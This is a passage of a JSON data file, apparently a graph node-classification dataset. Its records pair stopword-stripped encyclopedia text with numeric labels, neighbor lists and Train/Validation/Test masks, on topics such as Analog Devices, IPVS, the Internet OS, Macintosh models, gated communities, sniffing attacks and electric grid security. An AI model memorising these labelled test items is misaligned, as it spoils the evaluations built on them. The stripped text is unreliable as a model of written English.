advanced touch screen controllers portable media devices 2009 databeans published report top semiconductor analog suppliers analog devices named number two suppliers including texas instruments national semiconductor acquired texas instruments 2011 maxim integrated products linear technology collaborating analog devices since march 2017 competitors include infineon technologies stmicroelectronics intersil corporation 2011 analog devices third ranked analog semiconductor supplier 1967 analog devices first published analog dialogue dan sheingold took position editor two years later held four decades current editor scott wayne currently longest-running in-house publication electronics industry analog dialogue forum exchange circuits systems software real-world signal processing technical magazine published analog devices discusses products applications technology techniques analog digital mixed-signal processing analog dialogue published monthly web featured technical articles also compiled quarterly print editions 2009 analog devices announced engineerzone online technical support community engineerzone launched design engineering community customers prospects partners employees students ask questions share knowledge search answers questions open forum analog devices circuits lab reference circuits engineered tested quick system integration help solve design challenges ranging common complex reference circuits smaller modular designs broadly applicable application-specific reference designs reference circuit documented test data theory operation component selection decision criteria addition reference circuits tailored meet real-world system integration needs may also include board layout schematics cad tools models device drivers evaluation hardware",
    "neighbors": [
      1798,
      9863,
      7432,
      7819,
      11405,
      2454,
      8865,
      4773,
      3756,
      8237,
      6834,
      10675,
      1462,
      9665,
      10051,
      1221,
      11333,
      3911,
      9799,
      8268,
      3323,
      8921,
      8668,
      6495,
      9569,
      11646,
      9964,
      1400,
      5881,
      5371,
      6268,
      638
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7821,
    "label": 3,
    "text": "IP_Virtual_Server:ip virtual server ipvs ip virtual server implements transport-layer load balancing usually called layer 4 lan switching part linux kernel configured via user-space utility tool ipvs incorporated linux virtual server lvs runs host acts load balancer front cluster real servers ipvs direct requests tcp- udp-based services real servers make services real servers appear virtual services single ip address ipvs built top netfilter ipvs merged versions 2.4.x newer linux kernel mainline",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      6213,
      8268,
      5222,
      10856,
      4734,
      7812,
      4238,
      10382,
      2195,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      8439,
      2809,
      4360,
      792,
      10016,
      295,
      7983,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      8602,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7822,
    "label": 7,
    "text": "Internet_OS:internet os internet operating system internet os type operating system designed run applications services internet client generally web browser advantages os would would run thin client allowing cheaper easily manageable computer systems would require applications designed cross-platform open standards would tie user applications documents preferences single computer rather place internet cloud internet os also promoted perfect type platform software service talk internet os began surface 1995 browser war started heating microsoft netscape response limited capabilities html time microsoft began developing online content authoring platform would based distributed ole object linking embedding codenamed blackbird using ole applications put web would contain processing logic would act similar applications typical desktop environment immediately concerns would tie web proprietary microsoft technology would n't guaranteed run across different systems challenge marc andreessen netscape announced set new products would help transform browser called internet os would provide tools programming interfaces new generation internet-based applications so-called internet os would still run top regular os – based around netscape navigator – dismissed desktop operating systems like windows simply bag drivers reiterating goal would turn windows mundane collection entirely debugged device drivers andreessen explained newest versions navigator web browsers suites internet applications including programs mail ftp news would come viewers variety document types like adobe acrobat apple quicktime sun java applets would give programming interfaces publishing tools developers netscape also would continue sell server software java applets would run cross-platform clients servers scripting language form javascript would also provide facilities backend transaction processing elaborating client/server model navigating clients application servers database servers pointed – broad capabilities gave browser – difference technically netscape navigator traditional operating system navigator n't include device drivers technical problems blackbird growth web saw competitive statements netscape soon led microsoft rethink strategy began position ole primary tool within netscape proposed ecosystem ole would embeddable web pages using activex plug-in would easily integrated server side using asp active server pages development opposition industry microsoft began grow concept internet os led formation alliance around developing java alternative windows – chief partners netscape sun oracle ibm companies informally referred industry press gang four novell later joined alliance leading called gang five may 1997 group published position paper discussed integration software component models within corba – commonly used architecture allowing computer applications different vendors running different systems work together networks issued several rfps request proposals object management group omg standards body responsible managing corba meant help integrate different aspects java proposals included support javabeans – serialized component architecture java – javascript called java-tization corba group positioning java distributed object architecture similar microsoft intended ole blackbird ole would exist second-class technology would interface corba using javabeans group also promoted idea javaos – minimal java-based operating system – would turn run netscape web browser browser run javabeans components would front new ecosystem based open standards first html web browser second java hoped would become widely adopted corba javaos would hosted network computer nc concept long advocated oracle nc would thin client designed internet use leaving access applications documents stored entirely online oracle saw role providing tools server layer network-hosted applications would provided network application server turn would make use oracle7 relationship database management system oracle web server oracle also outlined referred network computing architecture nca would separate presentation application data access logic java applets nca cartridges microsoft intel response challenge put forward standard competing model called netpc diskless pc would primarily adapted web browser use would run simplified version windows 95 codenamed pegasus later road idea evolved netbook microsoft publicly criticized idea internet os instead argued traditional desktop os internet-enabled beginning idea active platform internet strategy culminated later release windows 98 strategy involved tightly bundling internet explorer windows became center united states anti-trust suit microsoft gang five – netscape sun ibm oracle novell – involved lobbying anti-trust action microsoft 1998 java alliance started fall apart oracle continued developing server-side java databases given idea network computer netscape given java browser efforts instead aiming position internet portal pressure investors given blame google revived idea internet os 2009 development chrome os linux-based operating system designed work exclusively ajax-based web applications operating system designed look operate like chrome web browser sold laptops developed partners called chromebooks also promoted g suite suite web applications alternative traditional desktop software microsoft office google tried address standard criticisms internet os concept development projects google native client allows browser run intel x86 native code sandbox complex programs could run fully take advantage system hardware google gears also created allow offline access online applications although deprecated favor web storage model process standardization world wide web consortium w3c",
    "neighbors": [
      3462,
      10026,
      10284,
      5677,
      10029,
      7983,
      5681,
      823,
      9665,
      467,
      3166,
      6367,
      3425,
      4194,
      4972,
      5612,
      9970,
      3323,
      124,
      5375
    ],
    "mask": "Test"
  },
  {
    "node_id": 7823,
    "label": 2,
    "text": "IS-DOS:is-dos is-dos disk operating system russian zx spectrum clones is-dos developed 1990 1991 iskra soft leningrad ussr handles floppy disks double sided double density hard disks cd-rom maximum is-dos partition size hard disk 16 mib unlike tr-dos is-dos ram-based operating system reduces amount memory user programs is-dos chic version developed nemo kay provides memory user programs tasis modern version developed nedopc atm turbo 2+ 2006 supports text mode high memory machine based is-dos chic",
    "neighbors": [
      4039,
      8713,
      11145,
      4076,
      10156,
      5359,
      5267,
      7959,
      7224,
      4409,
      1853,
      3129
    ],
    "mask": "Test"
  },
  {
    "node_id": 7824,
    "label": 3,
    "text": "Macintosh_IIvx:macintosh iivx macintosh iivx personal computer designed manufactured sold apple computer inc. october 1992 october 1993 last macintosh ii family macintosh computers iivx introduced time macintosh iivi performa 600 performa 600cd four models using new metal case design like performa 600cd iivx could equipped internal double-speed cd-rom drive iivx shares model designation macintosh ii computers apple considers iivx first computer macintosh centris line according apple lawyers unable complete trademark check centris name time iivx release machines bearing centris name introduced months later iivx described macworld magazine review best price-to-performance ratio computer apple ever built list price machine hard drive main memory video memory 2,949 usd adding cd-rom upgrading main memory video memory increased price 3,219 usd deemed best cd-rom drive bargain ever offered macworld much-more-powerful macintosh centris 650 released four months iivx 250 less immediately rendering iivx obsolete iivx base price slashed third increasing competition dell pc manufacturers prices iivx continued fall quickly end june 1993 price 5/80 cd-rom configuration dropped 1,799 half original price afterwards people bought expensive mac quickly became outdated said iivx-ed mac iivx began life development proof-of-concept see internal cd-rom drive could added mac apple ceo john sculley gave speech macworld tokyo promised mac cd-rom drive iivx rushed production several shortcuts taken design notably 32 mhz processor crippled 16 mhz bus making slightly slower popular aging macintosh iici serial port limited 57.6 kbit/s could cause problems serial connections midi hardware macintosh iivi slower version iivx 16 mhz processor introduced time markets though united states discontinued four months later high-end member original performa family performa 600 also based architecture iivx macintosh ii model 32k l2 cache iivx sold hard drives ranging 40 three nubus slots processor direct slot macintosh iivx uses case macintosh performa 600 reused centris 650 later known quadra 650 upgraded machine swapping logic board iivx case also used power macintosh 7100",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      1400,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 7825,
    "label": 9,
    "text": "Keysight_VEE:keysight vee keysight vee graphical dataflow programming software development environment keysight technologies automated test measurement data analysis reporting vee originally stood visual engineering environment developed hp designated hp vee since officially renamed keysight vee keysight vee widely used various industries serving entire stage product lifecycle design validation manufacturing optimized instrument control automation test measurement devices data acquisition instruments like digital voltmeters oscilloscopes source devices like signal generators programmable power supplies detailed list features version found references section vee program consists multiple connected vee objects sometimes called devices vee object consists different types pins namely data pins sequence pins execute pins xeq control pins error pins data pins govern data flow propagation sequence pins determine object execution order pins left side object called input pins whereas pins right output pins two objects b connected output pin object connected object b ’ input pin several connection lines emanate single output pin one connection line attached input pin data input pins execute pins must connected whereas control pins output pins left unconnected keysight vee dataflow programming language within vee program multiple connections objects data flows objects left right sequence flows top bottom object ’ execution order determined object connections data dependency rule general object unconnected data input sequence input pin operate first object sequence input pin connected execute soon data present data inputs hand sequence input pin connected although data present data input pins object hold execution sequence input pin pinged may applicable non-primitive objects like junction collector objects example object ’ sequence output pin connected fire object executed execution possible objects descended data output pins error pin object examples taken referred explanation keysight vee connect control variety keysight non-keysight instrumentation via multiple interfaces keysight vee supports following interfaces keysight vee interact programming languages using built-in activex automation server software development programs visual basic c/c++ visual c .net compliant languages call keysight vee userfunctions keysight vee also integrated microsoft .net framework common language runtime framework class libraries provides multitude functions controls used enhance program adding email capability accessing databases access 2500 matlab analysis visualization functions made possible built-in matlab signal processing toolbox built-in microsoft excel library provides direct access save retrieve generate reports spreadsheets keysight vee notable capability deploy unlimited number runtime programs time limitations extra cost runtime programs could contain gui panel allows interaction users presumably operators execute control program test execution",
    "neighbors": [
      2691,
      6797,
      7341,
      7983,
      7326
    ],
    "mask": "Test"
  },
  {
    "node_id": 7826,
    "label": 4,
    "text": "Gated_community:gated community modern form gated community walled community form residential community housing estate containing strictly controlled entrances pedestrians bicycles automobiles often characterized closed perimeter walls fences similar walls gates separated quarters cities centuries gated communities usually consist small residential streets include various shared amenities smaller communities amenities may include park common area larger communities may possible residents stay within community daily activities gated communities type common interest development distinct intentional communities given gated communities spatially type enclave setha m. low anthropologist argued negative effect net social capital broader community outside gated community gated communities usually called guard-gated communities staffed private security guards often home high-value properties and/or set retirement villages gated communities secure enough resemble fortresses intended besides services gatekeepers many gated communities provide amenities may depend number factors including geographical location demographic composition community structure community fees collected subassociations belong master associations master association may provide many amenities general larger association amenities provided amenities also depend type housing example single-family-home communities may common-area swimming pool since individual home-owners ability construct private pools condominium hand may offer community pool since individual units option private pool installation typical amenities offered include one brazil widespread form gated community called condomínio fechado closed housing estate object desire upper classes place small town infrastructure reserve power supply sanitation security guards purpose community protect residents exterior violence philosophy seen closed buildings shopping centres many accessed inside parking lot garage pakistan gated communities located big well small cities considered standard high quality living defence housing authority bahria town major private gated community developers administrators one largest world assets bahria town worth 30 billion gated communities pakistan public parks schools hospitals shopping malls gymnasiums country clubs argentina called barrios privados literal translation private neighborhoods countries often seen symbol wealth however gated communities enjoy dubious social prestige many members middle upper middle class regard gated community dwellers nouveaux riches snobs gated communities houses bigger ones nordelta hospital school shopping mall post-segregation south africa gated communities mushroomed response high levels violent crime commonly referred complexes also broadly classified security villages large-scale privately developed areas enclosed neighborhoods newest neighborhoods developed almost entirely composed security villages malls essential services hospitals part property developers adopted response counter squatting local residents fear due associated crime often results protracted eviction process popular southern china namely pearl river delta region famous clifford estates saudi arabia gated communities existed since discovery oil mainly accommodate families europe north america threat levels increased since late 1990s foreigners general u.s. citizens particular gates become armed sometimes heavily vehicles inspected marksmen saudi arabian national guard armored vehicles appeared certain times markedly recent terrorist attacks areas near-by targeting people european north american countries gated communities rare continental europe japan proponents gated communities lesser degree cul-de-sac maintain reduction exclusion people would passing generally non-local people makes stranger much recognisable closed local environment thus reduces crime danger since small proportion non-local people passing area potential criminals increased traffic increase rather decrease safety people around whose presence could deter criminal behaviour could provide assistance incident another criticism gated communities offer false sense security studies indicate safety gated communities may illusion reality gated communities suburban areas united states less crime similar non-gated neighborhoods commentary new york times specifically blames gated communities shooting death trayvon martin columnist states gated communities churn vicious cycle attracting like-minded residents seek shelter outsiders whose physical seclusion worsens paranoid groupthink outsiders influential paper vanessa watson includes gated communities within class african urban fantasies attempts remake african cities vein dubai singapore watson analysis kind urban planning prizes exclusionary self-contained spaces limit opportunities interaction different classes worsening marginalization urban poor closed cities russia different gated communities limited number gated communities long established foreigners various regions world many gated communities argentina especially greater buenos aires suburb pilar 60 km n buenos aires city suburban areas nordelta tortugas country club first gated community developed argentina dating 1930s/1940s date 1990s liberal reforms consolidated since buenos aires traditionally regarded socially integrated city gated communities subject research sociologists gated communities important way middle upper-class people cope high levels violent criminal activity greater buenos aires although gated communities rare australia since 1980s built well-known hope island particular sanctuary cove gold coast queensland similar projects built area victoria first development sanctuary lakes local government area wyndham 16 km south west melbourne new south wales macquarie links gated community well southgate estate gated community many australian gated communities built within private golf courses act example uriarra village based around community horse paddocks dwellings jointly managed strata title brazil also many gated communities particularly metropolitan regions rio de janeiro são paulo example one são paulo suburbs least 6 compounds known tamboré 1 2 3 consists generously spaced detached houses little separate front gardens one first big-scale gated community projects são paulo city region barueri alphaville planned constructed 1970s military dictatorship big cities brazil faced steep increases car ownership middle higher-classes rural exodus poverty crime urban sprawl downtown decay neighbourhoods physical explicit gating security checkpoints patrols extremely rare absent even canada richest neighbourhoods bridle path toronto furthermore municipal planning laws many canadian provinces ban locked gates public roads public health issue since deny emergency vehicles quick access noted exception canada arbutus ridge age-restricted community constructed 1988 1992 southeastern coast vancouver island common canadian neighbourhoods especially largest cities implicit symbolic gating effectively partitions private infrastructure amenities communities surrounding neighbourhoods classic example affluent montreal suburb mount royal long fence running along side l'acadie boulevard intents purposes separates community working-class neighbourhood park extension also many newer suburban subdivisions employ decorative gates give impression exclusivity seclusion china compounds like gated communities around world target rich also many foreigners live gated communities beijing often foreign companies choose locations foreign employees live cases pay rent associated costs e.g management fees garden work similar communities exist shanghai another major chinese city shanghai links exclusive expatriate community enclosing golf course shanghai american school example notable gated communities shanghai include seasons villas development hutchinson whampoa thomson golf villas green villas gated communities china daxing district beijing enclose homes rural migrants intended reduce crime increase public order safety communist party china-run people daily claims 73 system controversial segregates migrants poor claiming true purpose keep track migrants scheduled implementation changping district also guayaquil quito ecuador many gated communities coastal city guayaquil mostly located samborondón quito valleys surrounding city home mostly wealthiest people trend specially guayaquil houses gated communities moderate prices well greater cairo example dreamland mountain view egypt alexandria el maamoura india many gated neighborhoods also called colonies new delhi big cities upper middle-class upper-class people live new delhi mumbai chennai bangalore like gated communities sometimes communities separated wealth also ethnicity members particular ethnicity tend feel comfortable living among owing reasons related common festivals language cuisine examples common new delhi strong punjabi community many gated neighborhoods predominantly punjabi cases discrimination members ethnic backgrounds living communities likewise also exist bengali south indian muslim gujarati neighborhoods nowadays many modern gated communities developed like aamby valley city lavasa city maharashtra occupying 100 square kilometers area gated communities built chennai hyderabad bangalore lot real estate developers bangalore 3 locations community living bannerghatta hebbal villas devanahalli neighboring countries target housing societies seem upper-middle upper class citizens caste religious discrimination prevalent real estate industry several people denied homes based caste religion regardless factor non-residential indians interested gated housing indonesia gated communities luxurious lots 740 square metres 8000 sq ft affordable lots ranging 40 120 square metres 2000 new residential area build private developer gated community examples include bumi serpong damai south tangerang telaga golf sawangan pesona khayangan depok sentul city bogor regency gated communities indonesia still allow outsiders use facilities inside community regulation social facilities residential development handed local government used public two examples gated community italy olgiata rome village roccamare castiglione della pescaia tuscany malaysia known gated guarded communities seeing steady increase popularity currently according town country planning department four types gated communities malaysia namely gated community concept emerged response rise safety security issues offers advantages terms calm environment enhanced safety ideal family development gated communities mexico result huge income gap existing country 2008 study found average income urban area mexico 26,654 rate higher advanced regions like spain greece average income rural areas sometimes short distance away 8,403 close proximity wealth poverty created large security risk mexico middle class gated communities found virtually every medium large sized city mexico largest found major cities monterrey mexico city guadalajara luxury status gated communities popular middle high income residents mexico gated luxury communities mexico considerably cheaper countries united states retaining houses similar size quality due commonness communities lower cost build priced lower attract middle class residents many gated communities mexico fully independent self-contained infrastructure schools water power facilities security fire forces medical facilities larger gated communities even retain school districts police departments interlomas area mexico city contains hundreds gated communities largest concentration gated communities world stretching surrounding areas santa fe bosques-lomas interlomas-bosque real also made predominantly gated communities span 30 greater mexico city many smaller gated communities mexico officially classified separate gated communities many municipal rules prohibit closed roads small neighborhoods cater lower middle income residents offer close perimeter check points similar authentic gated community situation tolerated sometimes even promoted city governments due lack capacity provide reliable trusted security forces new zealand gated communities developed suburban areas main cities since 1980s 1990s pakistan large number gated communities target middle class pakistanis largest bahria town also largest asia communities major cities defence housing authority also major developer gated communities others include wapda town gulberg islamabad schon properties emaar properties also maintains several gated communities country targeting primarily upper class people gated communities pakistan mostly immune problems law enforcement lack energy faced majority housing societies short time property prices communities greatly increased – 2007 20-square-meter house bahria town lahore cost around four million rupees 40,000 similar property 2012 costed nine million rupees houses priced around 100-300 million rupees lima peru several gated communities especially wealthy districts la molina santiago de surco home many prominent peruvians philippines sizable number gated communities known philippine english subdivisions villages regardless names communities may either form part larger barangay village constitute single barangay aerobus live complex de facto first gated community moscow business center complex outside residential area ozero cooperative formed around vladimir putin dacha priozersky district leningrad oblast saudi arabia many expatriate workers required live company-provided housing 2003 attack al hambra jadawel siyanco vinell militant saudi dissidents government established tight military security compounds large western populations many western individuals also reside many gated compounds non-gated villas apartments cities work saudi aramco provides compound dhahran one largest kind within saudi arabia gated communities also popular many saudis accounts limited availability open villas communities premium rent paid housing compounds found many saudi arabia cities including limited abha dhahran riyadh taif south africa increasing number gated communities often wealthy enclosed live close proximity urban poor yet little contact two many housing estates thailand take form gated communities targeted upper middle classes may managed development company resident committees gated communities often referred mubans thailand turkey several gated communities especially istanbul ankara called site turkish mostly located around edge city united arab emirates gated communities exploded popularity particularly dubai 2002 decision allow foreigners freehold properties resulted construction numerous communities built along various themes examples include lakes springs meadows arabian ranches united kingdom gated communities relatively rare 2004 estimated 1,000 communities england i.e including scotland wales northern ireland usually small scale gated street 60 100 houses single block 500 700 flats found london example docklands new caledonian wharf kings queen wharf pan peninsula east london bow quarter bow london gated communities us unincorporated like indiana briar ridge may even span one incorporated municipality however numerous incorporated gated cities southern california namely bradbury canyon lake hidden hills laguna woods rolling hills meet legal requirements city halls municipal facilities public private corporations parks facilities within gates 1997 estimated 20,000 gated communities built across country approximately 40 new homes california behind walls 1997 estimates number people gated communities ranged 4 million 30,000 communities around 8 million million california alone one reason difficult determine many gated communities united states privately developed incorporated gated communities outside california including lake quivira kansas sea ranch lakes florida anderson creek north carolina north oaks minnesota hot springs village arkansas largest gated community united states 26,000 heavily wooded acres hot springs village governed hot springs village property owners association poa short private tax-exempt home owners association bay harbor michigan largest gated community midwestern united states village rosemont illinois outside chicago maintains security checkpoint entrance main residential section naval square first city philadelphia pennsylvania neighborhood gives suburban feel otherwise urban environment downtown miami florida neighborhood brickell key gated island community high-rise residential towers although anyone walk onto island come via public bus authorized automobiles may enter brickell key expensive apartments miami 2012 gated community retreat twin lakes made famous shooting trayvon martin george zimmerman national spotlight well year 2013 acquittal zimmerman",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 7827,
    "label": 4,
    "text": "Data_diddling:data diddling data diddling type cybercrime data altered entered computer system often data entry clerk computer virus computerized processing altered data results fraudulent benefit cases altered data changed back processing conceal activity results huge might include adjusting financial figures marginally could complex make entire system unusable",
    "neighbors": [
      4945,
      7739,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7828,
    "label": 4,
    "text": "Sniffing_attack:sniffing attack sniffing attack sniffer attack context network security corresponds theft interception data capturing network traffic using sniffer application aimed capturing network packets data transmitted across networks data packets encrypted data within network packet read using sniffer using sniffer application attacker analyze network gain information eventually cause network crash become corrupted read communications happening across network sniffing attacks compared tapping phone wires get know conversation reason also referred wiretapping applied computer networks using sniffing tools attackers sniff sensitive information network including email traffic smtp pop imap traffic web traffic http ftp traffic telnet authentication ftp passwords smb nfs many packet sniffer utility usually sniffs network data without making modifications network packets packet sniffers watch display log traffic information accessed attacker prevent networks sniffing attacks organizations individual users keep away applications using insecure protocols like basic http authentication file transfer protocol ftp telnet instead secure protocols https secure file transfer protocol sftp secure shell ssh preferred case necessity using insecure protocol application data transmission encrypted required vpn virtual private networks used provide secure access users",
    "neighbors": [
      9440,
      3490,
      7364,
      10245,
      3688,
      2953,
      9640,
      939,
      6360
    ],
    "mask": "Test"
  },
  {
    "node_id": 7829,
    "label": 4,
    "text": "Electric_grid_security:electric grid security electric grid security refers activities utilities regulators stakeholders play securing national electricity grid american electrical grid going one largest changes history move smart grid technology smart grid allows energy customers energy providers efficiently manage generate electricity similar new technologies smart grid also introduces new concerns security utility owners operators whether investor-owned municipal cooperative typically responsible implementing system improvements regards cybersecurity executives utilities industry beginning recognize business impact cybersecurity electric utility industry u.s. leads number initiatives help protect national electric grid threats industry partners federal government particularly national institute standards technology north american electric reliability corporation federal intelligence law enforcement agencies electric grids targets military terrorist activity american military leaders created first air war plan axis 1941 germany electric grid top target list north american electrical power grid highly connected system ongoing modernization grid generally referred smart grid reliability efficiency two key drivers development smart grid another example ability electrical system incorporate renewable energy sources wind power geothermal power one key issues electric grid security ongoing improvements modernizations created risk system example one risk specifically comes integration digital communications computer infrastructure existing physical infrastructure power grid according academic journal ieee security privacy magazine smart grid uses intelligent transmission distribution networks deliver electricity approach aims improve electric system reliability security efficiency two-way communication consumption data dynamic optimization electric-system operations maintenance planning u.s. federal energy regulatory commission ferc charge cybersecurity standards bulk power system system includes systems necessary operating interconnected grid investor-owned utilities operate different authority state public utility commissions falls outside ferc jurisdiction 2018 two evolutions taking place power economic sector evolutions could make harder utilities defend cyber threat first hackers become sophisticated attempts disrupt electric grids attacks targeted including spear phishing efforts aimed individuals shifting corporate networks include industrial control systems second grid becoming distributed connected growing internet things world could make every device could potential vulnerability 2006 200,000 miles transmission lines 230 kv higher existed united states main problem impossible secure whole system terrorist attacks scenario terrorist attack however would minimal would disrupt small portion overall grid example attack destroys regional transmission tower would temporary impact modern-day electric grid system capable restoring equipment damaged natural disasters tornadoes hurricanes ice storms earthquakes generally short period time due resiliency national grid events would difficult even well-organized large group terrorists cause physical damage small- moderate-scale tornado 2016 members russian hacker organization grizzly steppe infiltrated computer system vermont utility company burlington electric exposing vulnerability nation electric grid attacks hackers disrupt state electric grid however burlington electric discovered malware code computer system connected grid today utility industry advancing cybersecurity series initiatives partnering federal agencies goal improve sector-wide resilience physical cyber threats industry also working national institute standards technology north american electric reliability corporation federal intelligence law enforcement agencies 2017 electric companies spent 57.2 billion grid security september 2018 brien sheahan chairman ceo illinois commerce commission member u.s. department energy doe nuclear energy advisory committee robert powelson former federal energy regulatory commission ferc commissioner wrote published piece utility dive cyberthreats national power system require stronger national standards collaboration levels government recent article u.s. department homeland security confirmed russian hackers targeted control room american public utilities electric distribution system become networked together interconnected critical public services depend system water delivery financial institutions hospitals public safety prevent disruption network sheahan powelson recommended national standards collaboration federal state energy regulators utility companies cybersecurity-specific practices teams baltimore gas electric conducts regular drills employees also shares cyber-threat related information industry government partners duke energy put together corporate incident response team devoted cybersecurity 24 hours day unit works closely government emergency management law enforcement states cybersecurity procedures practices december 2018 u.s senators cory gardner michael bennet introduced legislation intended improve grid security nation-wide bills would create 90 million fund would distributed states develop energy security plans legislation would also require u.s. energy department identify vulnerabilities cyberattacks nation ’ electrical power grid electricity subsector coordinating council escc main liaison organization federal government electric power industry mission coordinate efforts prepare respond national-level disasters threats critical infrastructure escc composed electric company ceos trade association leaders segments industry federal government counterparts include senior administration officials white house relevant cabinet agencies federal law enforcement national security organizations",
    "neighbors": [
      4830
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7830,
    "label": 3,
    "text": "Macintosh_IIx:macintosh iix macintosh iix personal computer designed manufactured sold apple computer inc. september 1988 october 1990 model introduced update original macintosh ii replacing 16 mhz motorola 68020 cpu 68881 fpu 68030 cpu 68882 fpu running clock speed initial price iix version 40 mb hard drive 800 kb floppy drive replaced 1.44 mb superdrive iix first macintosh include standard mac iix included 0.25 kib l1 instruction cpu cache 0.25 kib l1 data cache 16 mhz bus 1:1 cpu speed supported system 7.5.5 iix second three macintosh models use case allowing dual floppy drives 6 nubus slots last model macintosh iifx apple nomenclature time used x indicate presence '030 cpu used macintosh iicx iivx support spare parts iix discontinued august 31 1998",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      576,
      1090,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      7286,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      2839,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      11171,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      10734,
      5616,
      10224,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Test"
  },
  {
    "node_id": 7831,
    "label": 1,
    "text": "Media_contacts_database:media contacts database media contacts database media database specific people media commonly journalists media contacts database consists mainly list journalists reporters editors publishers contributors freelance journalists tv show anchors radio show hosts djs etc media-type work media contacts database usually contains following information information available may less based research methods media research company creates database media contacts database pr tool used pr professionals pitch stories particular topic product company specific group journalists journalists would write speak particular topic relevant issue episode shows media contacts database allows pr professional gain easy access hundreds journalists within short span time media contacts database created sold many media research companies offer pr software professionals",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 7832,
    "label": 3,
    "text": "Road_Fighter:road fighter game later released msx home computer system 1985 nintendo entertainment system japan 1985 europe 1992 followed format original game included konami arcade classics 1999 nintendo ds arcade game released i-mode phones japan 2005 road fighter made available microsoft game room service xbox 360 console windows-based pcs march 24 2010 first second levels contain 4 courses ranging grassy plains water bridge seashore mountains finally forest area arcade version 6 stages contained pressing b button raises player speed around 196 km/h pressing button skyrockets speed 400 player limited amount fuel earn touching special multi-colored cars player collides car slips occasionally appearing patches oil car begin spin corrected may crash side barriers causing loss 5-6 fuel units nes famicom version total 6 types cars 1 yellow red three blue one truck yellow cars travel along straight line occur large numbers red cars little less likely appear change lane travelling get way player blue cars vary way change lane trucks go straight way colliding causes player crash konami man make cameo appearance flying side road player progresses certain point level without crashing included course 2 nes famicom versions midnight run road fighter 2 sequel road fighter released arcades march 1996 playstation 1997 arcade version released worldwide playstation version released japan europe europe playstation version titled midnight run removing road fighter connection main selling point allows player shift back forth manual automatic transmission races although different 2-d road fighter scenery similar racing games set japan initial arcade stage wangan midnight except cars licensed player also unique selection normal cars tuned cars reviewing arcade version next generation praised support four players challenging ai multiple tracks ability switch manual automatic mid-race tight controls powerslides car selection generally fast-paced racing nonetheless concluded game slightly average scored three five stars winding heat sequel road fighter midnight run released arcades 1996 first appeared arcades september though arcades receive units later improved version midnight run road fighter 2 though normal tuned cars rules remain unlike midnight run takes place touge roads cabinet came two configurations sitdown version 50 inch monitor upright version 25 inch monitor cabinets linked support four players road fighters japan-only sequel original road fighter released arcades 2010 game features 3d-enhanced graphics mounted pair goggles used view effect tracks set real-life locations based race courses previous konami racing titles including enthusia professional racing gti club series game includes numerous licensed vehicles saved using konami e-amusement pass containing tuning customization data game konami answer sega initial arcade stage 4 namco wangan midnight maximum tune terms card-based games taito chase h.q 2 terms rebooted sequels opening theme take higher composed together system music sota fujimori included beatmania iidx 18 resort anthem playable song addition game includes music beatmania iidx dance dance revolution series form promote another konami arcade games",
    "neighbors": [
      9957,
      6797,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 7833,
    "label": 3,
    "text": "ARM_Cortex-A15:arm cortex-a15 arm cortex-a15 mpcore 32-bit processor core licensed arm holdings implementing armv7-a architecture multicore processor out-of-order superscalar pipeline running 2.5 ghz arm claimed cortex-a15 core 40 percent powerful cortex-a9 core number cores speed first a15 designs came autumn 2011 products based chip reach market 2012 key features cortex-a15 core first implementation came samsung 2012 exynos 5 dual shipped october 2012 samsung chromebook series 3 arm version followed november google nexus 10 press announcements current implementations licensees lg expected produce a15 based design point",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      8815,
      630,
      10361,
      638,
      644,
      7300,
      8842,
      146,
      659,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      1776,
      9970,
      6391,
